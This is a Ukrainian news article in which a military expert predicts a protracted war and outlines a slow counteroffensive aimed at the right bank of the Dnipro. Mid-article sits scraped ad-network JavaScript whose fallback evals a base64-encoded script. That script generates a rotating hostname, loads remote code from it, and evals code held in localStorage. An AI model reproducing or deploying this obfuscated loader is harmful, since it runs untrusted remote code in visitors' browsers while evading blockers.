«Війна буде тривалою»: експерт оцінив можливості контрнаступу ЗСУ на Запоріжжі

Військовий експерт Черник оцінив можливості української армії на Дніпропетровщині та Запоріжжі: він назвав умови ефективного контрнаступу і стратегічну ціль для ЗСУ, а також спрогнозував терміни тривалості війні.

Про це інформує Акцент з посиланням на етер Радіо НВ.

На Запорізькому напрямку йде перегрупування ворожих військ, — Генштаб

На думку військового експерта Петра Черника, війна буде тривалою, її активна фаза в найкращому випадку стихне восени, а через оперативну паузу відновиться знову.

«Ця війна буде тривалою — вона не закінчиться ні через місяць, ні через два. В найкращому випадку стихне на осінь ця фаза і не має значення (…) і через якусь справжню оперативну паузу відновиться по-новому. Допоки Карфаген не буде зруйновано — допоки рф не розпадеться — ми не видихнемо і саме під таким кутом треба дивитися на абсолютно всі події, котрі відбуваються на фронті. І тоді уся логіка чи не логіка їх (окупантів — ред.) дій стає зрозумілою як божий день, тобто — імперія не збирає здаватися — вона хоче ліквідувати Україну, тобто під такою призмою дивимося на всі події і направду у нас відпаде маса питань по тактиці і організації на війні», — наголосив експерт.

Голова ЗОВА озвучив прогноз щодо деокупації Запорізької області

Військовий експерт також оцінив можливості України на Дніпропетровщині і Запоріжжі: на його думку, важливо нищити боєкомплекти ворога великими вогневими рубежами і концентруватися на одному напрямку, а контрнаступ здійснювати маленькими кроками. До того ж, на його думку, правий берег Дніпра є стратегічною ціллю, деокупація якої вплине на подальший хід бойових дій. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

«На мій погляд, наші можливості полягають у тому, щоб виставляти великі вогневі рубежі і нищити їхні (російські — ред.) боєкомплекти, дозвольте я буду критичним реалістом, на мій погляд вартує концентруватися усього на одному напрямку — тільки маленькими кроками, або ще б я цю тактику назвав «тактикою салямі», тобто — відрізання назад усіх наших територій і першою стратегічною ціллю, на мій погляд, має залишатися правий берег Дніпра. Як тільки нам вдастся його деокупувати, наголошую, ми тоді наблизимося практично до Дніпра і через Дніпро зможемо почати здійснювати більш серйозні вогневі впливи, особливо на плацдармі, який я називаю Нова Каховка — на мій погляд, це стратегічна точка. (…) Нагадаю: там знаходяться гідровузли, які контролюють кримську воду, перекривання кримського каналу суттєво покращить наш і психологічний, в тому числі, тиск на противника. Не вартує поспішати (контранаступати — ред.) — поспішати треба повільно», — підсумував експерт.

На Запорізькому напрямку ворог перекидає сили з Донбасу: британська розвідка пояснила дії РФ

Як раніше повідомляв Акцент, екс-міністр оборони України пояснив причину активного посилення рашистів на півдні і дав прогноз подальшому розвитку дій. Також, він оцінив готовність українського контрнаступу на Херсонщині.

РФ активно посилюється на Запорізькому та Херсонському напрямках: прогноз екс-міністра оборони України

Також, як інформував Акцент, ситуація на пункті пропуску у Василівці вкрай складна: мер Мелітополя Федоров прокоментував поточну ситуацію на виїзді з окупованих територій до Запоріжжя та розповів нові подробиці. (adsbygoogle = window.adsbygoogle || []).push({});

Мер Мелітополя прокоментував ускладнення виїзду з окупованих територій у Запоріжжя Подписывайтесь на Акцент в ПІДТРИМКА САЙТУ АКЦЕНТ Источник: https://akzent.zp.ua/vijna-bude-trivaloyu-ekspert-otsiniv-mozhlivosti-kontrnastupu-zsu-na-zaporizhzhi/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top